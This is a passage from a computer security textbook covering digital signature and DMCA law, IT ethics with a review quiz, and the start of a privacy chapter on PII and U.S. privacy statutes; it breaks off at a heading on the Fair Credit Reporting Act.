Canada was an early leader in the use of digital signatures. Singapore, Canada, and the U.S. state of Pennsylvania were the first governments to have digitally signed an interstate contract. This contract, digitally signed in 1998, concerned the establishment of a Global Learning Consortium between the three governments (source: Krypto-Digest Vol. 1, No. 749, June 11, 1998). Canada went on to adopt a national model bill for electronic signatures to promote e-commerce. This bill, the Uniform Electronic Commerce Act (UECA), allows the use of electronic signatures in communications with the government. The law contains general provisions for the equivalence between traditional and electronic signatures (source: BNA ECLR, May 27, 1998, p. 700) and is modeled after the UNCITRAL Model Law on E-Commerce (source: BNA ECLR, September 13, 2000, p. 918). The UECA is similar to Bill C-54, Personal Information Protection and Electronic Documents Act (PIPEDA), in authorizing governments to use electronic technology to deliver services and communicate with citizens. Individual Canadian provinces have passed similar legislation defining digital signature provisions for e-commerce and government use. These laws are modeled after the UNCITRAL Model Law on E-Commerce to enable widespread use of e-commerce transactions. These laws have also modified the methods of interactions between the citizens and the government, enabling electronic communication in addition to previous forms.
European Laws
The European Commission adopted a Communication on Digital Signatures and Encryption: "Ensuring Security and Trust in Electronic Communication—Towards a European Framework for Digital Signatures and Encryption." This communication states that a common framework at the EU level is urgently needed to stimulate "the free circulation of digital signature related products and services within the Internal market" and "the development of new economic activities linked to electronic commerce" as well as "to facilitate the use of digital signatures across national borders." Community legislation should address common legal requirements for certificate authorities, legal recognition of digital signatures, and international cooperation. This communication was debated, and a common position was presented to the member nations for incorporation into national laws. On May 4, 2000, the European Parliament and Council approved the common position adopted by the council. In June 2000, the final version, the Electronic Commerce Directive (2000/31/EC), was adopted. The directive has been implemented by member states. To implement the articles contained in the directive, member states had to remove barriers, such as legal form requirements, to electronic contracting, leading to uniform digital signature laws across the EU.
Digital Rights Management
The ability to make flawless copies of digital media has led to another "new" legal issue. For years, the music and video industry has relied on technology to protect its rights with respect to intellectual property. It has been illegal for decades to copy information, such as music and videos, protected by copyright. Even with the law, people have for years made copies of music and videos to share, violating the law. Until the advent of digital copies (see Tech Tip sidebar "Digital Copies and Copyright"), this did not represent a significant economic impact in the eyes of the industry, as the copies were of lesser quality and people would pay for original quality in sufficient numbers to keep the economics of the industry healthy. As such, legal action against piracy was typically limited to large-scale duplication and sale efforts, commonly performed overseas and subsequently shipped to the United States as counterfeit items.
Tech Tip
Digital Copies and Copyright
The ability of anyone with a PC to make a perfect copy of digital media led to industry fears that individual piracy actions could cause major economic issues in the recording industry. To protect the rights of the recording artists and the economic health of the industry as a whole, the music and video recording industry lobbied the U.S. Congress for protection, which was granted under the Digital Millennium Copyright Act (DMCA) on October 20, 1998.
The primary statute enacted in the United States to bring copyright legal concerns up to date with the digital world is the Digital Millennium Copyright Act (DMCA). The DMCA states its purpose as follows: "To amend title 17, United States Code, to implement the World Intellectual Property Organization Copyright Treaty and Performances and Phonograms Treaty, and for other purposes." The majority of this law was well crafted, but one section has drawn considerable comment and criticism. A section of the law makes it illegal to develop, produce, and trade any device or mechanism designed to circumvent technological controls used in copy protection.
Tech Tip
DMCA Research Exemption Requirements
The DMCA has specific exemptions for research, provided four elements are satisfied:
The person lawfully obtained the encrypted copy, phonorecord, performance, or display of the published work.
Such act is necessary to conduct such encryption research.
The person made a good faith effort to obtain authorization before the circumvention.
Such act does not constitute infringement under this title or a violation of applicable law other than this section, including section 1030 of title 18 and those provisions of title 18 amended by the Computer Fraud and Abuse Act of 1986.
Although, on the surface, this seems a reasonable requirement, the methods used in most cases are cryptographic in nature, and this provision had the ability to eliminate and/or severely limit research into encryption and the strengths and weaknesses of specific methods. A DMCA provision, Section 1201(g), was included to provide for specific relief and allow exemptions for legitimate research (see the Tech Tip sidebar "DMCA Research Exemption Requirements"). With this section, the law garnered industry support from several organizations, such as the Software & Information Industry Association (SIIA), Recording Industry Association of America (RIAA), and Motion Picture Association of America (MPAA). Based on these inputs, the U.S. Copyright Office issued a report supporting the DMCA in a required report to the U.S. Congress. This seemed to settle the issues until the RIAA threatened to sue an academic research team headed by Professor Edward Felten from Princeton University. The issue behind the suit was the potential publication of results demonstrating that several copy protection methods were flawed in their application. This research came in response to an industry-sponsored challenge to break the methods. After breaking the methods developed and published by the industry, Felten and his team prepared to publish their findings. The RIAA objected and threatened a suit under provisions of the DMCA. After several years of litigation and support of Felten by the Electronic Frontier Foundation (EFF), the case was eventually resolved in the academic team's favor, although no case law to prevent further industry-led threats was developed.
One of the controversial issues associated with DMCA is the issue of takedown notices. Carriers such as YouTube are granted protection from content violation, provided they remove the content when requested with a takedown order. The publishing industry uses scanners and automated systems to issue takedown notices, and these sometimes go awry (see the sidebar on the Mars Rover mishap). The issue of fair use is one that is not delineated by bright-line regulations, making the system one that sides with the takedown requestor unless the content poster takes them to court.
Mars Rover Crashed by DMCA
NASA maintains a YouTube channel where it posts videos of space events, such as the landing of the rover Curiosity on the surface of Mars. The content was developed by NASA with U.S. taxpayer money, yet it was served a takedown notice by Scripps News Service. The issue was remedied, but taxpayers lost early coverage and had to pay the legal bills to fight for their own content. This happens on a regular basis to the NASA channel, and although the law has provisions for prosecuting false takedowns, they are rarely used.
Exemptions are scattered throughout the DMCA, although many were created during various deliberations on the act and do not make sense when the act is viewed in whole. The effect of these exemptions upon people in the software and technology industry is not clear, and until restrained by case law, the DMCA gives large firms with deep legal pockets a potent weapon to use against parties who disclose flaws in encryption technologies used in various products. Actions have already been initiated against individuals and organizations who have reported security holes in products. This will be an active area of legal contention, as the real issues behind digital rights management have yet to be truly resolved.
Ethics
Ethics has been a subject of study by philosophers for centuries. It might be surprising to note that ethics associated with computer systems has a history dating back to the beginning of the computing age. The first examination of cybercrime occurred in the late 1960s, when the professional conduct of computer professionals was examined with respect to their activities in the workplace. If we consider ethical behavior to be consistent with that of existing social norms, it can be fairly easy to see what is considered right and wrong. But with the globalization of commerce, and the globalization of communications via the Internet, questions are raised on what is the appropriate social norm. Cultural issues can have wide-ranging effects on this, and although the idea of an appropriate code of conduct for the world is appealing, it is as yet an unachieved objective.
The issue of globalization has significant local effects. If a user wishes to express free speech via the Internet, is this protected behavior or criminal behavior? Different locales have different sets of laws to deal with items such as free speech, with some recognizing the right, and others prohibiting it. With the globalization of business, what are the appropriate controls for intellectual property when some regions support this right, while others do not even recognize intellectual property as something of value, but rather something owned by the collective of society? The challenge in today's business environment is to establish and communicate a code of ethics so that everyone associated with an enterprise can understand the standards of expected performance.
A great source of background information on all things associated with computer security, the SANS Institute published a set of IT ethical guidelines ("IT Code of Ethics") in April 2004: see www.sans.org/security-resources/ethics.php.
Tech Tip
IT Code of Ethics
SANS Institute IT Code of Ethics,¹ Version 1.0, April 24, 2004:
I will strive to know myself and be honest about my capability.
I will strive for technical excellence in the IT profession by maintaining and enhancing my own knowledge and skills. I acknowledge that there are many free resources available on the Internet and affordable books and that the lack of my employer's training budget is not an excuse nor limits my ability to stay current in IT.
When possible I will demonstrate my performance capability with my skills via projects, leadership, and/or accredited educational programs and will encourage others to do so as well.
I will not hesitate to seek assistance or guidance when faced with a task beyond my abilities or experience. I will embrace other professionals' advice and learn from their experiences and mistakes. I will treat this as an opportunity to learn new techniques and approaches. When the situation arises that my assistance is called upon, I will respond willingly to share my knowledge with others.
I will strive to convey any knowledge (specialist or otherwise) that I have gained to others so everyone gains the benefit of each other's knowledge.
I will teach the willing and empower others with Industry Best Practices (IBP). I will offer my knowledge to show others how to become security professionals in their own right. I will strive to be perceived as and be an honest and trustworthy employee.
I will not advance private interests at the expense of end users, colleagues, or my employer.
I will not abuse my power. I will use my technical knowledge, user rights, and permissions only to fulfill my responsibilities to my employer.
I will avoid and be alert to any circumstances or actions that might lead to conflicts of interest or the perception of conflicts of interest. If such circumstance occurs, I will notify my employer or business partners.
I will not steal property, time or resources.
I will reject bribery or kickbacks and will report such illegal activity. I will report on the illegal activities of myself and others without respect to the punishments involved. I will not tolerate those who lie, steal, or cheat as a means of success in IT.
I will conduct my business in a manner that assures the IT profession is considered one of integrity and professionalism.
I will not injure others, their property, reputation, or employment by false or malicious action.
I will not use availability and access to information for personal gains through corporate espionage.
I distinguish between advocacy and engineering. I will not present analysis and opinion as fact.
I will adhere to Industry Best Practices (IBP) for system design, rollout, hardening and testing.
I am obligated to report all system vulnerabilities that might result in significant damage.
I respect intellectual property and will be careful to give credit for others' work. I will never steal or misuse copyrighted, patented material, trade secrets or any other intangible asset.
I will accurately document my setup procedures and any modifications I have done to equipment. This will ensure that others will be informed of procedures and changes I've made.
I respect privacy and confidentiality.
I respect the privacy of my co-workers' information. I will not peruse or examine their information including data, files, records, or network traffic except as defined by the appointed roles, the organization's acceptable use policy, as approved by Human Resources, and without the permission of the end user.
I will obtain permission before probing systems on a network for vulnerabilities. I respect the right to confidentiality with my employers, clients, and users except as dictated by applicable law. I respect human dignity.
I treasure and will defend equality, justice and respect for others. I will not participate in any form of discrimination, whether due to race, color, national origin, ancestry, sex, sexual orientation, gender/sexual identity or expression, marital status, creed, religion, age, disability, veteran's status, or political ideology.
¹ © 2000–2015 The SANS™ Institute. Reprinted with permission.
Chapter24Review
ChapterSummaryAfterreadingthischapterandcompletingtheexercises,youshouldunderstandthefollowingregardingthebasicsoflegalandethicalconsiderationsassociatedwithinformationsecurity.
Explainthelawsandrulesconcerningimportingandexportingencryptionsoftware
Importandexportofhigh-strengthcryptographicsoftwareiscontrolledinmanycountries,includingtheUnitedStates.
Possessionofencryptionprogramsorencrypteddatacanbeacrimeinmanycountries.
TheWassenaarArrangementisaninternationalagreementbetweencountriesconcerningtheimport/exportofcryptographicsoftwareandhasenabledmass-marketedproductstogenerallyflowacrossborders.
Identifythelawsthatgoverncomputeraccessandtrespass
Gainingunauthorizedaccess,bywhatevermeans,includingusingsomeoneelse’scredentials,iscomputertrespass.
Exceedinggrantedauthorityisalsocomputertrespass.
Manynationshaveversionsofcomputertrespassormisusestatutes,althoughtheterminologyvariesgreatlyamongcountries.
Identifythelawsthatgovernencryptionanddigitalrightsmanagement
Encryptiontechnologyisusedtoprotectdigitalrightsmanagementandpreventunauthorizeduse.
CircumventingtechnologicalcontrolsusedtoprotectintellectualpropertyisaviolationoftheDMCA.
Insomecountries,carryingencrypteddatacanresultinauthoritiesdemandingthekeysorthreateningprosecutionforfailuretodisclosethekeys.
Describethelawsthatgoverndigitalsignatures
Digitalsignatureshavethesamelegalstatusaswrittensignatures.
DigitalsignaturesusePINsorother“secrets”thatrequireend-usersafeguardingtobeprotectedfromfraud.
Exploreethicalissuesassociatedwithinformationsecurity
Ethicsisthesocial–moralenvironmentinwhichapersonmakesdecisions.
Ethicscanvarybysocio-culturalfactorsandgroups.
KeyTermsadministrativelaw(698)caselaw(698)clickfraud(697)commonlaw(698)ComputerFraudandAbuseAct(CFAA)(701)computertrespass(699)DigitalMillenniumCopyrightAct(DMCA)(709)ElectronicCommunicationsPrivacyAct(ECPA)(700)Gramm-Leach-BlileyAct(GLBA)(702)PaymentCardIndustryDataSecurityStandard(PCIDSS)(703)Sarbanes-OxleyAct(SOX)(703)Section404(703)statutorylaw(698)StoredCommunicationsAct(SCA)(700)
WassenaarArrangement(705)
Key Terms Quiz

Use terms from the Key Terms list to complete the sentences that follow. Don't use the same term more than once. Not all terms will be used.

1. IT controls were mandated in public companies by _______________, part of the Sarbanes-Oxley Act.
2. The contractual set of rules governing credit card security is the _______________.
3. A catchall law to prosecute hackers is the statute on _______________.
4. The _______________ is the primary U.S. federal law on computer intrusion and misuse.
5. The power of government-sponsored agencies lies in _______________.
6. A(n) _______________ is passed by a legislative branch of government.
7. _______________ comes from the judicial branch of government.
Multiple-Choice Quiz

1. Your Social Security number and other associated facts kept by your bank are protected by what law against disclosure?
A. The Social Security Act of 1934
B. The USA Patriot Act of 2001
C. The Gramm-Leach-Bliley Act
D. HIPAA

2. Breaking into another computer system in the United States, even if you do not cause any damage, is regulated by what law?
A. State law, as the damage is minimal
B. Federal law under the Identity Theft and Assumption Deterrence Act
C. Federal law under the Electronic Communications Privacy Act (ECPA) of 1986
D. Federal law under the USA Patriot Act of 2001

3. Export of encryption programs is regulated by which entity?
A. U.S. State Department
B. U.S. Commerce Department
C. U.S. Department of Defense
D. National Security Agency

4. For the FBI to install and operate Carnivore on an ISP's network, what is required?
A. A court order specifying specific items being searched for
B. An official request from the FBI
C. An impact statement to assess recoverable costs to the ISP
D. A written request from an ISP to investigate a computer trespass incident

5. True or false: A sysadmin who is reading employee e-mail to look for evidence of someone stealing company passwords is protected by the company-owned equipment exemption on eavesdropping.
A. False, there is no "company-owned exemption."
B. True, provided he or she has his or her manager's approval.
C. True, provided he or she has senior management permission in writing.
D. True, if it is in his or her job description.

6. True or false: Writing viruses and releasing them across the Internet is a violation of law.
A. Always true. All countries have reciprocal agreements under international law.
B. Partially true. Depends on the laws in the country of origin.
C. False. Computer security laws do not cross international boundaries.
D. Partially true. Depends on the specific countries involved, both of the virus author and the recipient.

7. Publication of flaws in encryption used for copy protection is a potential violation of:
A. HIPAA
B. U.S. Commerce Department regulations
C. DMCA
D. National Security Agency regulations

8. Circumventing technological controls to prevent reverse-engineering is a violation of:
A. HIPAA
B. DMCA
C. ECPA
D. All of the above

9. Logging in as your boss to fix your time records is:
A. OK, if you are accurately reporting your time
B. One of the obscure elements of DMCA
C. A violation of the Separation of Duties Law
D. A form of computer trespass

10. You are arrested as a result of your hacking activities and investigators find you have been breaking password files and sharing them across the Internet. Which law have you violated?
A. CFAA
B. ECPA
C. DMCA
D. HIPAA
Essay Quiz

1. You are being hired as the director of IT for a small firm that does retail trade business, and you will be the source of knowledge for all things IT, including security and legal regulations. Outline the legal elements you would want to have policy covering, and include how you would disseminate this information.

2. You have just been hired as a system administrator for a small college. The college's servers are used for database storage and a website that serves the college community. Describe the laws that will potentially impact your job with respect to computer security. What actions will you take to ensure compliance with laws and regulations?
Chapter 25 Privacy

"They who would give up an essential liberty for temporary security, deserve neither liberty or security."
—BENJAMIN FRANKLIN

In this chapter, you will learn how to
Define privacy
Identify privacy laws relative to computer security in various industries
Describe issues associated with technology and privacy
Explain the concept of personally identifiable information (PII)
Craft a privacy policy for online records
Recognize web-related privacy issues

The advent of interconnected computer systems has enabled businesses and governments to share and integrate information. This has led to a resurgence in the importance of privacy laws worldwide. Governments in Europe and the United States have taken different approaches in attempts to control privacy via legislation. As a new generation grows up in a digital world, its view of information sharing services, such as social networking sites, has created a shift in how people view privacy. Many social and philosophical differences have led to the differing views on privacy, but as the world becomes interconnected, understanding and resolving them will be important.

Privacy can be defined as the power to control what others know about you and what they can do with that information. In the computer age, personal information forms the basis for many decisions, from credit card transactions to purchase goods to the ability to buy an airplane ticket and fly. Although it is theoretically possible to live an almost anonymous existence today, the price for doing so is high—from higher prices at the grocery store (no frequent shopper discount), to higher credit costs, to challenges with air travel, opening bank accounts, and seeking employment. Information is an important item in today's society. From instant credit, to digital access to a wide range of information via the Internet, to electronic service portals such as e-commerce sites, e-government sites, and so on, our daily lives have become intertwined with privacy issues. Information has become a valuable entity, for it is an enabler of many functions. A few hundred years ago, if someone wanted to procure ownership of an item, he would typically trade something of tangible value (for example, coins) with the current owner of the item, and an exchange would take place. The two parties, buyer and seller, would have to meet in space and time and conduct a transaction. Or, in some cases, they would employ a third-party agent to act as a proxy and do the transaction for them. Today, one would go online, search for the best deal (information-centric), conduct business via e-commerce (use computer programs as agents), pay for the item via bank card transaction (information exchange concerning funds availability and transfer), and, in some cases, receive delivery digitally (in the case of software, books, videos, and so forth). The creation of an information-centric economy is as dramatic a revolution as the adoption of money to act as an economic utility, simplifying bartering. This revolution and reliance on information imbues information with value, creating the need to protect it.

Privacy is the right to control information about you and what others can do with that information.
Personally Identifiable Information (PII)

When information is about a person, failure to protect it can have specific consequences. Business secrets are protected through trade secret laws, government information is protected through laws concerning national security, and privacy laws protect information associated with people. A set of elements that can lead to the specific identity of a person is referred to as personally identifiable information (PII). By definition, PII can be used to identify a specific individual, even if an entire set is not disclosed.

As little information as the ZIP code, gender, and date of birth can resolve to a single person.

PII is an essential element of many online transactions, but it can also be misused if disclosed to unauthorized parties. For this reason, it should be protected at all times, by all parties that possess it.

Tech Tip
Collecting PII
PII is by nature sensitive to end users. Loss or compromise of end-user PII can result in financial and other impacts borne by the end user. For this reason, collection of PII should be minimized to what is actually needed. Three great questions to ask when determining whether to collect PII are these:
Do I need each specific data element?
What is my business purpose for each specific element?
Will my customers/end users agree with my rationale for collecting each specific element?

TRUSTe (www.truste.com), an independent trust authority, defines personally identifiable information as any information … (i) that identifies or can be used to identify, contact, or locate the person to whom such information pertains, or (ii) from which identification or contact information of an individual person can be derived. Personally Identifiable Information includes, but is not limited to: name, address, phone number, fax number, e-mail address, financial profiles, medical profile, social security number, and credit card information.

The concept of PII is used to identify which data elements require a specific level of protection. When records are used individually (not in aggregate form), then PII is the concept of connecting a set of data elements to a specific purpose. If this can be accomplished, then the information is PII and needs specific protections. The U.S. Federal Trade Commission (FTC) has repeatedly ruled that if a firm collects PII, it is responsible for it through the entire life cycle, from initial collection through use, retirement, and destruction. Only after the PII is destroyed in all forms and locations is the company's liability for its compromise abated.

Sensitive PII

Some PII is so sensitive to disclosure and resulting misuse that it requires special handling to ensure protection. Data elements such as credit card data, bank account numbers, and government identifiers (social security number, driver's license number, and so on) require extra levels of protection to prevent harm from misuse. Should these elements be lost or compromised, direct, personal financial damage may occur to the person identified by the data. These elements need special attention when planning data stores and executing business processes associated with PII data, including collection, storage, and destruction.

Try This!
Search for Your Own PII
Modern Internet search engines have the ability to catalog tremendous quantities of information and make wide-area searches for specific elements easy. Using your own elements of PII, try searching the Internet and see what is returned on your name, address, phone number, social security number, date of birth, and so forth. For security reasons, be sure to be anonymous when doing this—that is, log out of Google applications before using Google Search, Microsoft/Live applications before using Bing, or Yahoo applications before using Yahoo Search. This step may seem minor, but with search records being stored, the last thing you want to do is provide records that can cross-correlate data about yourself. If you find data on yourself, analyze the source and whether or not the data should be publicly accessible.

If the accidental disclosure of user data could cause the user harm, such as discrimination (political, racial, health related, or lifestyle), then the best course of action is to treat the information as sensitive PII.

Notice, Choice, and Consent

As privacy is defined as the power to control what others know about you and what they can do with this information, and PII represents the core items that should be controlled, communication with the end user concerning privacy is paramount. Privacy policies are presented later in the chapter, but with respect to PII, three words can govern good citizenry when collecting PII. Notice refers to informing the customer that PII will be collected and used and/or stored. Choice refers to the opportunity for the end user to consent to the data collection or to opt out. Consent refers to the positive affirmation by a customer that she read the notice, understands her choices, and agrees to release her PII for the purposes explained to her.
U.S. Privacy Laws

Identity privacy and the establishment of identity theft crimes is governed by the Identity Theft and Assumption Deterrence Act, which makes it a violation of federal law to knowingly use another's identity. The collection of information necessary to do this is also governed by the Gramm-Leach-Bliley Act (GLBA), which makes it illegal for someone to gather identity information on another person under false pretenses. In the education area, privacy laws have existed for years (see "Family Education Records and Privacy Act (FERPA)," later in the chapter).

Tech Tip
Major Elements of the Privacy Act
The Privacy Act has numerous required elements and definitions. Among other things, the major elements require federal agencies to
Publish in the Federal Register a notice of each system of records that it maintains, including information about the type of records maintained, the purposes for which they are used, and the categories of individuals on whom they are maintained.
Maintain only such information about an individual as required by law, or is needed to perform a statutory duty.
Maintain information in a timely, accurate, relevant, secure, and complete form.
Inform individuals about access to PII upon inquiry. Notify individuals from whom it requests information what authorizes it to request the information; whether disclosure is mandatory or voluntary; the purpose for which the information may be used; and penalties for not providing the requested information.
Establish appropriate physical, technical, and administrative safeguards for the information that is collected and used.
Additional elements can be found by examining provisions of the act itself, although it is drafted in legislative form and requires extensive cross-referencing and interpretation.

A task force from the Department of Health, Education, and Welfare (HEW) developed the Code of Fair Information Practices, consisting of five clauses: openness, disclosure, secondary use, correction, and security. These main subjects continue today as the core of many privacy practices. Two major privacy initiatives followed from the U.S. government, the Privacy Act of 1974 and the Freedom of Information Act of 1996.

Privacy Act of 1974

The Privacy Act of 1974 was an omnibus act designed to affect the entire federal information landscape. This act has many provisions that apply across the entire federal government, with only minor exceptions for national security (classified information), law enforcement, and investigative provisions. This act has been amended numerous times, and you can find current, detailed information at the Electronic Privacy Information Center (EPIC) website, http://epic.org/privacy/laws/privacy_act.html.

Freedom of Information Act (FOIA)

The Freedom of Information Act (FOIA) of 1996 is one of the most widely used privacy acts in the United States, so much so that its acronym, FOIA (pronounced "foya"), has reached common use. FOIA was designed to enable public access to U.S. government records, and "public" includes the press, which purportedly acts on the public's behalf and widely uses FOIA to obtain information. FOIA carries a presumption of disclosure; the burden is on the government, not the requesting party, to substantiate why information cannot be released. Upon receiving a written request, agencies of the U.S. government are required to disclose those records, unless they can be lawfully withheld from disclosure under one of nine specific exemptions in FOIA. The right of access is ultimately enforceable through the federal court system. The nine specific exemptions, listed in Section 552 of U.S. Code Title 5, fall within the following general categories:
1. National security and foreign policy information
2. Internal personnel rules and practices of an agency
3. Information specifically exempted by statute
4. Confidential business information
5. Inter- or intra-agency communication that is subject to deliberative process, litigation, and other privileges
6. Information that, if disclosed, would constitute a clearly unwarranted invasion of personal privacy
7. Law enforcement records that implicate one of a set of enumerated concerns
8. Agency information from financial institutions
9. Geological and geophysical information concerning wells

FOIA is frequently used and generates a tremendous amount of work for many federal agencies, resulting in delays to requests. This in itself is a testament to its effectiveness.

Record availability under FOIA is less of an issue than is the backlog of requests. To defray some of the costs associated with record requests, and to prevent numerous trivial requests, agencies are allowed to charge for research time and duplication costs. These costs vary by agency, but are typically nominal, in the range of $8.00 to $45.00 per hour for search/review fees and $.10 to $.35 per page for duplication. Agencies are not allowed to demand a requester to make an advance payment unless the agency estimates that the fee is likely to exceed $250 or the requester previously failed to pay proper fees. For many uses, the first 100 pages are free, and under some circumstances the fees can be waived.

Family Education Records and Privacy Act (FERPA)

Student records have significant protections under the Family Education Records and Privacy Act of 1974, which includes significant restrictions on information sharing. FERPA operates on an opt-in basis, as the student must approve the disclosure of information prior to the actual disclosure. FERPA was designed to provide limited control to students over their education records. The law allows students to have access to their education records, an opportunity to seek to have the records amended, and some control over the disclosure of information from the records to third parties. For example, if the parent of a student who is 18 or older inquires about the student's schedule, grades, or other academic issues, the student has to give permission before the school can communicate with the parent, even if the parent is paying for the education. FERPA is designed to protect privacy of student information. At the K–12 school level, students are typically too young to have legal standing associated with exercising their rights, so FERPA recognizes the parents as part of the protected party. FERPA provides parents with the right to inspect and review their children's education records, the right to seek to amend information in the records they believe to be inaccurate, misleading, or an invasion of privacy, and the right to consent to the disclosure of PII from their children's education records. When a student turns 18 years old or enters a postsecondary institution at any age, these rights under FERPA transfer from the student's parents to the student.
U.S. Computer Fraud and Abuse Act (CFAA)

The U.S. Computer Fraud and Abuse Act (as amended in 1994, 1996, 2001, and 2008) and privacy laws such as the EU Data Protection Directive have several specific objectives, but one of the main ones is to prevent unauthorized parties from accessing information they should not have access to. Fraudulent access, or even exceeding one's authorized access, is defined as a crime and can be punished. Although the CFAA is intended for broader purposes, it can be used to protect privacy related to computer records through its enforcement of violations of authorized access.
Cross Check
CFAA and Data Protection Directives and Privacy Issues
The primary purpose of these sweeping acts is to provide a simple tool for law enforcement to prosecute criminals who attempt to access systems to gain access to data and information. When this results in a privacy violation, the original computer trespass violation still exists and is prosecutable. What evidence would a sysadmin need to produce to demonstrate a violation associated with computer trespass? Additional information on these laws is in Chapter 24.

U.S. Children's Online Privacy Protection Act (COPPA)

Children lack the mental capacity to make responsible decisions concerning the release of PII. The U.S. Children's Online Privacy Protection Act of 1998 (COPPA) specifically addresses this privacy issue with respect to children accessing and potentially releasing information on the Internet. Any website that collects information from children (ages 13 and under), even simple web forms to allow follow-up communications and so forth, is covered by this law. Before information can be collected and used, parental permission needs to be obtained. This act requires that sites obtain parental permission, post a privacy policy detailing specifics concerning information collected from children, and describe how the children's information will be used.

Video Privacy Protection Act (VPPA)

Considered by many privacy advocates to be the strongest U.S. privacy law, the Video Privacy Protection Act of 1988 provides civil remedies against unauthorized disclosure of personal information concerning video tape rentals and, by extension, DVDs and games as well. This is a federal statute, crafted in response to media searches of rental records associated with Judge Bork when he was nominated to the U.S. Supreme Court. Congress, upset with the liberal release of information, reacted with legislation, drafted by Senator Leahy, who noted during the floor debate that new privacy protections are necessary in "an era of interactive television cables, the growth of computer checking and check-out counters, of security systems and telephones, all lodged together in computers...." (S. Rep. No. 100-599, 100th Cong., 2d Sess. at 6 (1988)). This statute, civil in nature, provides for civil penalties of up to $2500 per occurrence, as well as other civil remedies. The statute provides the protections by default, thus requiring a video rental company to obtain the renter's consent to opt out of the protections if the company wants to disclose personal information about rentals. Exemptions exist for issues associated with the normal course of business for the video rental company as well as for responding to warrants, subpoenas, and other legal requests. This law does not supersede state laws, of which there are several. Many states have enacted laws providing both wider and greater protections than the federal VPPA statute. For example, Connecticut and Maryland laws brand video rental records as confidential, and therefore not subject to sale, while California, Delaware, Iowa, Louisiana, New York, and Rhode Island have adopted state statutes providing protection of privacy with respect to video rental records. Michigan's video privacy law is as sweeping as its broad super-DMCA state statute. This state law specifically protects records of book purchases, rentals, and borrowing as well as video rentals.
Health Insurance Portability & Accountability Act (HIPAA)

Medical and health information also has privacy implications, which is why the U.S. Congress enacted the Health Insurance Portability and Accountability Act (HIPAA) of 1996. HIPAA calls for sweeping changes in the way health and medical data is stored, exchanged, and used. From a privacy perspective, significant restrictions of data transfers to ensure privacy are included in HIPAA, including security standards and electronic signature provisions. HIPAA security standards mandate a uniform level of protections regarding all health information that pertains to an individual and is housed or transmitted electronically. The standards mandate safeguards for physical storage, maintenance, transmission, and access to individuals' health information. HIPAA mandates that organizations that use electronic signatures have to meet standards ensuring information integrity, signer authentication, and nonrepudiation. These standards leave to industry the task of specifying the technical solutions and mandate compliance only to significant levels of protection as provided by the rules being released by industry.

Tech Tip
Protected Health Information (PHI)
HIPAA regulations define Protected Health Information (PHI) as "any information, whether oral or recorded in any form or medium" that "[i]s created or received by a health care provider, health plan, public health authority, employer, life insurer, school or university, or health care clearinghouse"; and "[r]elates to the past, present, or future physical or mental health or condition of an individual; the provision of health care to an individual; or the past, present, or future payment for the provision of health care to an individual."

HIPAA's language is built upon the concepts of Protected Health Information (PHI) and Notice of Privacy Practices (NPP). HIPAA describes "covered entities" including medical facilities, billing facilities, and insurance (third-party payer) facilities. Patients are to have access to their PHI and an expectation of appropriate privacy and security associated with medical records. HIPAA mandates a series of administrative, technical, and physical security safeguards for information, including elements such as staff training and awareness, and specific levels of safeguards for PHI when in use, stored, or in transit between facilities.

Try This!
Notice of Privacy Practices
Visit your local doctor's office, hospital, or clinic and ask for their Notice of Privacy Practices (NPP). This notice to patients details what information will be collected and the uses and safeguards that are applied. These can be fairly lengthy and detailed documents, and in many cases are in a booklet form.

In 2009, as part of the American Recovery and Reinvestment Act of 2009, the Health Information Technology for Economic and Clinical Health Act (HITECH Act) was passed into law. Although the primary purpose of the HITECH Act was to provide stimulus money for the adoption of electronic medical records (EMR) systems at all levels of the health care system, it also contained new security and privacy provisions to add teeth to those already in HIPAA. HIPAA protections were confined to the direct medical profession, and did not cover entities such as health information exchanges and other "business associates" engaged in the collection and use of PHI. Under HITECH, business associates will be required to implement the same security safeguards and restrictions on uses and disclosures, to protect individually identifiable health information, as covered entities under HIPAA. It also subjects business associates to the same potential civil and criminal liability for breaches as covered entities. HITECH also specifies that the U.S. Department of Health & Human Services (HHS) is now required to conduct periodic audits of covered entities and business associates.

Tech Tip
HIPAA Penalties
HIPAA civil penalties for willful neglect are increased under the HITECH Act. These penalties can extend up to $250,000, and repeat/uncorrected violations can extend up to $1.5 million. Under HIPAA and the HITECH Act an individual cannot bring a cause of action against a provider. The laws specify that a state attorney general can bring an action on behalf of state residents.
Gramm-Leach-Bliley Act (GLBA)

In the financial arena, GLBA introduced the U.S. consumer to privacy notices, requiring firms to disclose what they collect, how they protect the information, and with whom they will share it. Annual notices are required as well as the option for consumers to opt out of the data sharing. The primary concept behind U.S. privacy laws in the financial arena is that consumers be allowed to opt out. This was strengthened in GLBA to include specific wording and notifications as well as requiring firms to appoint a privacy officer. Most U.S. consumers have witnessed the results of GLBA, every year receiving privacy notices from their banks and credit card companies. These notices are one of the visible effects of GLBA on changing the role of privacy associated with financial information.
California Senate Bill 1386 (SB 1386)

California Senate Bill 1386 (SB 1386) was a landmark law concerning information disclosures. It mandates that Californians be notified whenever PII is lost or disclosed. Since the passage of SB 1386, numerous other states have modeled legislation on this bill, and although national legislation has been blocked by political procedural moves, it will eventually be passed. The current list of U.S. states and territories that require disclosure notices is up to 49, with only Alabama, New Mexico, and South Dakota without bills. Each of these disclosure notice laws is different, making the case for a unifying federal statute compelling, but currently it is low on the priority lists of most politicians.

U.S. Banking Rules and Regulations

Banking has always had an element of PII associated with it, from who has deposits to who has loans. As the scale of operations increased, both in numbers of customers and products, the importance of information for processing grew. Checks became a utility instrument to convey information associated with funds transfer between parties. As a check was basically a promise to pay, in the form of directions to a bank, occasionally the check was not honored and a merchant had to track down the party to demand payment. Thus, it became industry practice to write additional information on a check to assist a firm in later tracking down the drafting party. This information included items such as address, work phone number, a credit card number, and so on. This led to the co-location of information about an individual, and this information was used at times to perform a crime of identity theft. To combat this and prevent the gathering of this type of information, a series of banking and financial regulations were issued by the U.S. government to prohibit this form of information collection. Other regulations addressed items such as credit card numbers being printed on receipts, mandating only the last five digits be exposed.

Payment Card Industry Data Security Standard (PCI DSS)

As described in Chapter 24, the major credit card firms, such as MasterCard, Visa, American Express, and Discover, designed a private-sector initiative to deal with privacy issues associated with credit card transaction information. PCI DSS is a standard that provides guidance on what elements of a credit card transaction need protection and the level of expected protection. PCI DSS is not a law, but rather a contractual regulation, enforced through a series of fines and fees associated with performing business in this space. PCI DSS was a reaction to two phenomena, data disclosures and identity theft.

Fair Credit Reporting Act (FCRA)

